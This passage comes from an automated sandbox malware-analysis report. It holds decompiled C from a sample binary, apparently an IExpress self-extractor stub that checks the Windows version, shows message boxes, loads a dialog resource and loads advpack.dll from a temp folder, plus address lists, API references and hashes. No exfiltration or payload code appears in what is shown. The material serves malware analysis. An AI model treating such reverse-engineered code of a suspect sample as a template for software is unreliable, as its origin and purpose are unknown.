                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xe88a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0xe88a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("cent");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E00E8681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E00E867C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E00E828E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0xe89a40 = _t119;
                                                                                                                                                                                                        						 *0xe88184 = 1;
                                                                                                                                                                                                        						 *0xe88180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0xe89a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xe88184 = _t135;
                                                                                                                                                                                                        							 *0xe88180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E00E844B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E00E86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00e836f9
                                                                                                                                                                                                        0x00e83700
                                                                                                                                                                                                        0x00e8370c
                                                                                                                                                                                                        0x00e83716
                                                                                                                                                                                                        0x00e83718
                                                                                                                                                                                                        0x00e8371b
                                                                                                                                                                                                        0x00e83721
                                                                                                                                                                                                        0x00e8372b
                                                                                                                                                                                                        0x00e8373d
                                                                                                                                                                                                        0x00e83745
                                                                                                                                                                                                        0x00e83746
                                                                                                                                                                                                        0x00e83746
                                                                                                                                                                                                        0x00e83749
                                                                                                                                                                                                        0x00e837ab
                                                                                                                                                                                                        0x00e837ad
                                                                                                                                                                                                        0x00e837ae
                                                                                                                                                                                                        0x00e837b3
                                                                                                                                                                                                        0x00e837b8
                                                                                                                                                                                                        0x00e837b8
                                                                                                                                                                                                        0x00e837bf
                                                                                                                                                                                                        0x00e837bf
                                                                                                                                                                                                        0x00e837c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e837cb
                                                                                                                                                                                                        0x00e837cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e837d5
                                                                                                                                                                                                        0x00e837db
                                                                                                                                                                                                        0x00e837e8
                                                                                                                                                                                                        0x00e837ea
                                                                                                                                                                                                        0x00e837ea
                                                                                                                                                                                                        0x00e837ea
                                                                                                                                                                                                        0x00e837f0
                                                                                                                                                                                                        0x00e837f6
                                                                                                                                                                                                        0x00e83805
                                                                                                                                                                                                        0x00e83817
                                                                                                                                                                                                        0x00e8382b
                                                                                                                                                                                                        0x00e83830
                                                                                                                                                                                                        0x00e83836
                                                                                                                                                                                                        0x00e8383b
                                                                                                                                                                                                        0x00e8383d
                                                                                                                                                                                                        0x00e838eb
                                                                                                                                                                                                        0x00e838eb
                                                                                                                                                                                                        0x00e838f2
                                                                                                                                                                                                        0x00e8390c
                                                                                                                                                                                                        0x00e83911
                                                                                                                                                                                                        0x00e83911
                                                                                                                                                                                                        0x00e83913
                                                                                                                                                                                                        0x00e8394d
                                                                                                                                                                                                        0x00e8394d
                                                                                                                                                                                                        0x00e8394f
                                                                                                                                                                                                        0x00e838a9
                                                                                                                                                                                                        0x00e838a9
                                                                                                                                                                                                        0x00e838b0
                                                                                                                                                                                                        0x00e838b2
                                                                                                                                                                                                        0x00e838b9
                                                                                                                                                                                                        0x00e838bb
                                                                                                                                                                                                        0x00e838c1
                                                                                                                                                                                                        0x00e83975
                                                                                                                                                                                                        0x00e838c7
                                                                                                                                                                                                        0x00e838de
                                                                                                                                                                                                        0x00e838e0
                                                                                                                                                                                                        0x00e838e0
                                                                                                                                                                                                        0x00e8397b
                                                                                                                                                                                                        0x00e8397d
                                                                                                                                                                                                        0x00e839a9
                                                                                                                                                                                                        0x00e8397f
                                                                                                                                                                                                        0x00e83982
                                                                                                                                                                                                        0x00e8398b
                                                                                                                                                                                                        0x00e8398d
                                                                                                                                                                                                        0x00e8398f
                                                                                                                                                                                                        0x00e8399f
                                                                                                                                                                                                        0x00e839a1
                                                                                                                                                                                                        0x00e83991
                                                                                                                                                                                                        0x00e83991
                                                                                                                                                                                                        0x00e83991
                                                                                                                                                                                                        0x00e8398f
                                                                                                                                                                                                        0x00e839af
                                                                                                                                                                                                        0x00e839b6
                                                                                                                                                                                                        0x00e83a0f
                                                                                                                                                                                                        0x00e83a0f
                                                                                                                                                                                                        0x00e83a11
                                                                                                                                                                                                        0x00e83a13
                                                                                                                                                                                                        0x00e83a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839b8
                                                                                                                                                                                                        0x00e839b8
                                                                                                                                                                                                        0x00e839ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839bc
                                                                                                                                                                                                        0x00e839bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839c3
                                                                                                                                                                                                        0x00e839c9
                                                                                                                                                                                                        0x00e839ce
                                                                                                                                                                                                        0x00e839d0
                                                                                                                                                                                                        0x00e839e3
                                                                                                                                                                                                        0x00e839e5
                                                                                                                                                                                                        0x00e839e6
                                                                                                                                                                                                        0x00e839f1
                                                                                                                                                                                                        0x00e839f7
                                                                                                                                                                                                        0x00e839fa
                                                                                                                                                                                                        0x00e83a01
                                                                                                                                                                                                        0x00e83a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83a06
                                                                                                                                                                                                        0x00e83a09
                                                                                                                                                                                                        0x00e83a09
                                                                                                                                                                                                        0x00e83a0b
                                                                                                                                                                                                        0x00e83a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83a09
                                                                                                                                                                                                        0x00e839fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839fc
                                                                                                                                                                                                        0x00e839d3
                                                                                                                                                                                                        0x00e839d8
                                                                                                                                                                                                        0x00e839da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839dc
                                                                                                                                                                                                        0x00e839b6
                                                                                                                                                                                                        0x00e83955
                                                                                                                                                                                                        0x00e8395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83961
                                                                                                                                                                                                        0x00e83963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83969
                                                                                                                                                                                                        0x00e83969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83969
                                                                                                                                                                                                        0x00e83915
                                                                                                                                                                                                        0x00e83915
                                                                                                                                                                                                        0x00e8391b
                                                                                                                                                                                                        0x00e8391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8392d
                                                                                                                                                                                                        0x00e83933
                                                                                                                                                                                                        0x00e83938
                                                                                                                                                                                                        0x00e8393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83940
                                                                                                                                                                                                        0x00e83946
                                                                                                                                                                                                        0x00e8394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e838f2
                                                                                                                                                                                                        0x00e83843
                                                                                                                                                                                                        0x00e83845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8384b
                                                                                                                                                                                                        0x00e8384d
                                                                                                                                                                                                        0x00e83883
                                                                                                                                                                                                        0x00e83885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8389a
                                                                                                                                                                                                        0x00e8389e
                                                                                                                                                                                                        0x00e8389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e838a0
                                                                                                                                                                                                        0x00e838a0
                                                                                                                                                                                                        0x00e838a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e838a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e838a4
                                                                                                                                                                                                        0x00e8384f
                                                                                                                                                                                                        0x00e83851
                                                                                                                                                                                                        0x00e83857
                                                                                                                                                                                                        0x00e8386e
                                                                                                                                                                                                        0x00e83877
                                                                                                                                                                                                        0x00e8387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83881
                                                                                                                                                                                                        0x00e83859
                                                                                                                                                                                                        0x00e8385c
                                                                                                                                                                                                        0x00e83862
                                                                                                                                                                                                        0x00e83866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e838f4
                                                                                                                                                                                                        0x00e838f4
                                                                                                                                                                                                        0x00e838f5
                                                                                                                                                                                                        0x00e838fb
                                                                                                                                                                                                        0x00e83901
                                                                                                                                                                                                        0x00e83901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8390a
                                                                                                                                                                                                        0x00e8374b
                                                                                                                                                                                                        0x00e8374e
                                                                                                                                                                                                        0x00e8375c
                                                                                                                                                                                                        0x00e83764
                                                                                                                                                                                                        0x00e83769
                                                                                                                                                                                                        0x00e8376e
                                                                                                                                                                                                        0x00e83771
                                                                                                                                                                                                        0x00e8379c
                                                                                                                                                                                                        0x00e8379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e837a3
                                                                                                                                                                                                        0x00e837a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e837a4
                                                                                                                                                                                                        0x00e83773
                                                                                                                                                                                                        0x00e83777
                                                                                                                                                                                                        0x00e83778
                                                                                                                                                                                                        0x00e8377f
                                                                                                                                                                                                        0x00e83781
                                                                                                                                                                                                        0x00e8378e
                                                                                                                                                                                                        0x00e8378e
                                                                                                                                                                                                        0x00e83794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83794
                                                                                                                                                                                                        0x00e83783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83785
                                                                                                                                                                                                        0x00e8378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8378c
                                                                                                                                                                                                        0x00e83750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8372d
                                                                                                                                                                                                        0x00e8372d
                                                                                                                                                                                                        0x00e8396b
                                                                                                                                                                                                        0x00e8396b
                                                                                                                                                                                                        0x00e8396c
                                                                                                                                                                                                        0x00e8396e
                                                                                                                                                                                                        0x00e8396f
                                                                                                                                                                                                        0x00e83a1e
                                                                                                                                                                                                        0x00e83a1e
                                                                                                                                                                                                        0x00e83a22
                                                                                                                                                                                                        0x00e83a27
                                                                                                                                                                                                        0x00e83a3e
                                                                                                                                                                                                        0x00e83a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00E83723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00E839C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00E839F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$cent
                                                                                                                                                                                                        • API String ID: 2519184315-3438608206
                                                                                                                                                                                                        • Opcode ID: 6842d6bd3feda248f3a0c1820f3a2e94d867a331343deadd576ad4e68cd3b2fd
                                                                                                                                                                                                        • Instruction ID: 1fdcd22a22abc3d295ac622bcc0433c05b133d5bb7bada227289cf2262f15d87
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6842d6bd3feda248f3a0c1820f3a2e94d867a331343deadd576ad4e68cd3b2fd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0591E571E012149FDB38AE35CD817EA77A1EB85B08F1520EAD88DB7291DB718F80CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                        			E00E86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0xe89a3c; // 0xe80000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E00E844B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t5 =  &_a16; // 0xe82ee8
                                                                                                                                                                                                        					_t24 =  *_t5;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x00e8651f
                                                                                                                                                                                                        0x00e8652a
                                                                                                                                                                                                        0x00e86534
                                                                                                                                                                                                        0x00e8656b
                                                                                                                                                                                                        0x00e86577
                                                                                                                                                                                                        0x00e8657c
                                                                                                                                                                                                        0x00e8657c
                                                                                                                                                                                                        0x00e86536
                                                                                                                                                                                                        0x00e8653e
                                                                                                                                                                                                        0x00e86542
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86544
                                                                                                                                                                                                        0x00e86547
                                                                                                                                                                                                        0x00e8654c
                                                                                                                                                                                                        0x00e86549
                                                                                                                                                                                                        0x00e86549
                                                                                                                                                                                                        0x00e86549
                                                                                                                                                                                                        0x00e8655e
                                                                                                                                                                                                        0x00e86560
                                                                                                                                                                                                        0x00e86569
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86569
                                                                                                                                                                                                        0x00e86542
                                                                                                                                                                                                        0x00e86587

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00E80000,000007D6,00000005), ref: 00E8652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00E80000,00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E86538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00E80000,00000000,00000547,00E819E0,00000000), ref: 00E86557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E86560
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                        • API String ID: 1214682469-1603360339
                                                                                                                                                                                                        • Opcode ID: d90c9fda2d128a76bcc54ade2cf9974c426c33589eb3288458df9d5bd88125ef
                                                                                                                                                                                                        • Instruction ID: 55bc5aa2eddb3b6bb0f53fa88db3e1c7833c48a8bee7f46f743250250388c2c4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d90c9fda2d128a76bcc54ade2cf9974c426c33589eb3288458df9d5bd88125ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 350126B2100609BFDB106FAA9C08DBB7B6DEB85764F040526FE1CB3190D7718C1087A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00E86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E00E81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E00E8658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x00e86495
                                                                                                                                                                                                        0x00e86495
                                                                                                                                                                                                        0x00e864a0
                                                                                                                                                                                                        0x00e864a7
                                                                                                                                                                                                        0x00e864ab
                                                                                                                                                                                                        0x00e864bd
                                                                                                                                                                                                        0x00e864c2
